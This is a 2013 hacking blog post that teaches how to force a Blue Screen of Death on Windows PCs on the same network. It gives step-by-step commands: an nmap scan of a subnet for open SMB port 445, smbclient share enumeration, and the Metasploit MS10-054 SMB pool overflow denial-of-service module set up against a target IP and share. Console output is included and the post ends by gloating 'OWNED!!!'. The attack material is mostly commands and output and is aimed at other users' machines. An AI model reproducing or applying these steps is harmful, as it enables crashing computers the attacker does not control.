Searching...
May 30, 2013

How To Launch BSOD Attack to Windows

Hey guys.... Missing me? I mean, do you missing penetration testing tutorial? It's been a long time I don't post about penetration testing since I decide to learn programming language. Anyway, in this post I'll tell you how to make Windows get a BSOD aka Blue Screen of Death.

Faq:

Q: What the fuck is that?
A: The Blue Screen of Death (BSOD), officially a STOP Error, also known as Deadscreen, Blue Screen Error, Bluescreen, or bug check, is the error screen displayed by the Microsoft Windows family of operating systems upon encountering a critical error, of a non-recoverable nature, that causes the system to crash. The term is named after the color of the screen generated by the error.

Here are some BSOD that I got from Internet

BSOD on Windows 8

BSOD on Previous Windows

Requirement:

Condition
  1. You should be in one LAN with your target.
  2. You have to know what is your target's IP.
  3. Your target's firewall must be in inactive state.
  4. Your target share his/her folder on LAN.
  5. You have to know what folder which their shared.
  6. You have a working brain.

Tools
  1. Network mapper (You can use Nmap for information gathering session)
  2. Metasploit (which can be found here)

How To:
1. Find out what is you IP address:

You can find out what is your ip address by following command


Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] ifconfig wlan0

Which provided this output


Output :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] ifconfig wlan0wlan0     Link encap:Ethernet  HWaddr e0:b9:a5:9d:37:e9            inet addr:192.168.1.105  Bcast:192.168.1.255  Mask:255.255.255.0          inet6 addr: fe80::e2b9:a5ff:fe9d:37e9/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:190272 errors:0 dropped:0 overruns:0 frame:0          TX packets:124610 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:243524173 (232.2 MiB)  TX bytes:14349659 (13.6 MiB)

The red blocked numbers are your IP address.

NOTE: wlan0 is common interface for wireless network on linux. Adjust your own network interface. If you use wired network, it should be eth0, etc.

In this tutorial, I'm using VMWare to tested if this method is work or not. Thus will not make  harm to anyone.


Output :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] ifconfig wlan0vmnet8    Link encap:Ethernet  HWaddr 00:50:56:c0:00:08            inet addr:192.168.222.1  Bcast:192.168.222.255  Mask:255.255.255.0          inet6 addr: fe80::250:56ff:fec0:8/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:84 errors:0 dropped:0 overruns:0 frame:0          TX packets:72 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

So, my IP address is 192.168.222.1

2. Find out your target's IP Address

In this section, you may use any tools which provide you network assessment ability. In this case, I'm using Nmap which more faster (since it could be ran from console), and more reliable.

Back to requirement, we need to know whether our target is behind firewall or not, we also need to know whether our target share his/her folder or not. Thus will make a statement that:

Windows users who are not using firewall, are able to be ping-ed by someone, and they are opening port on 445 (smb service)

So let's check who is/are opening his/her 445 port by following command

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] nmap 192.168.222.1-255 -p 445

Still remember my IP address? Yes, thus I type 192.168.222.1 on my Nmap command. So, what about -255? It is max range of IP address. So in this case, I want to scan a network from 192.168.222.1 to 192.168.1.255. Yes, it's a whole IP address on that LAN.

And what about -p 445? It's a port. Yes, I'm only scan IPs with opened 445 port in my LAN. Thus will make faster result since I will skip any IP with closed 445 port.

Try to adjust your IP address. Example: if your IP address is 10.20.0.33, then you type following command

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] nmap 10.20.0.1-255 -p 445

Try to remove tail number, and replace with 1. So you are able to scan IP address above you (10.20.0.1 to 10.20.0.32).

So after I scan my network, here are the outputs

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] nmap 10.20.0.1-255 -p 445
Starting Nmap 6.00 ( http://nmap.org ) at 2013-05-30 20:09 WITNmap scan report for 192.168.222.1Host is up (0.0014s latency).PORT    STATE  SERVICE445/tcp closed microsoft-ds
Nmap scan report for 192.168.222.128Host is up (0.0021s latency).PORT    STATE SERVICE445/tcp open  microsoft-ds
Nmap done: 255 IP addresses (2 hosts up) scanned in 45.20 seconds


So, we have 192.168.222.128 with opened 445 port.

3. Find out, is he/she share his/her folder

You may wonder, why our target must share his/her folder so we can make his/her PC / Laptop get BSOD? Well, in this case, I will use DOS method. Which could make a system going down by sending malicious code from request header to smb service. So how to know whether our target share his/her folder? Well, you can use this simple command.

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] smbclient -L \\TARGET IP -N

In this case, my target's IP is 192.168.222.128. So my command look like this

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] smbclient -L \\192.168.222.128 -N

And it will provide an output like this

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] smbclient -L \\192.168.222.128 -NDomain=[MICROSOFT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
Sharename       Type      Comment ---------       ----      ------- Secret Stuff    Disk       E$              Disk      Default share IPC$            IPC       Remote IPC ADMIN$          Disk      Remote Admin C$              Disk      Default sharesession request to 192.168.222.128 failed (Called name not present)session request to 192 failed (Called name not present)Domain=[MICROSOFT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
Server               Comment ---------            -------
Workgroup            Master ---------            -------


We need share name in this output. We can use one of them, in this case I will use Secret Stuff.

4. Launch BSOD Attack

Start from metasploit console, by following command

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] msfconsole

And setup your options

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] msfconsole  +-------------------------------------------------------+  |  METASPLOIT by Rapid7                                 |  +---------------------------+---------------------------+  |      __________________   |                           |  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |  |             )=\           | |  EXPLOIT   \            |  |            // \\          | |_____________\_______    |  |           //   \\         | |==[msf >]============\   |  |          //     \\        | |______________________\  |  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |  |        //         \\      |  *********************    |  +---------------------------+---------------------------+  |      o O o                |        \'\/\/\/'/         |  |              o O          |         )======(          |  |                 o         |       .'  LOOT  '.        |  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |  | |    PAYLOAD     |""\___, |     /    (_||_     \      |  | |________________|__|)__| |    |     __||_)     |     |  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |  |  = = = = = = = = = = = =  |     '--------------'      |  +---------------------------+---------------------------+

       =[ metasploit v4.6.1-2013052201 [core:4.6 api:1.0]+ -- --=[ 1109 exploits - 699 auxiliary - 179 post+ -- --=[ 298 payloads - 29 encoders - 8 nops

msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow msf auxiliary(ms10_054_queryfs_pool_overflow) > set RHOST 192.168.222.128RHOST => 192.168.222.128msf auxiliary(ms10_054_queryfs_pool_overflow) > set SMBSHARE "Secret Stuff"SMBSHARE => Secret Stuff

RHOST is your target's IP. SMBSHARE is folder which his/her share. All done, and Let's Kicking Ass!

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]└─[] msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit[*] Sending malformed trans2 request..[*] The target should encounter a blue screen error now.[*] Auxiliary module execution completedmsf auxiliary(ms10_054_queryfs_pool_overflow) > 

And... ... ...

OWNED!!!

4 comment:

 
Back to top!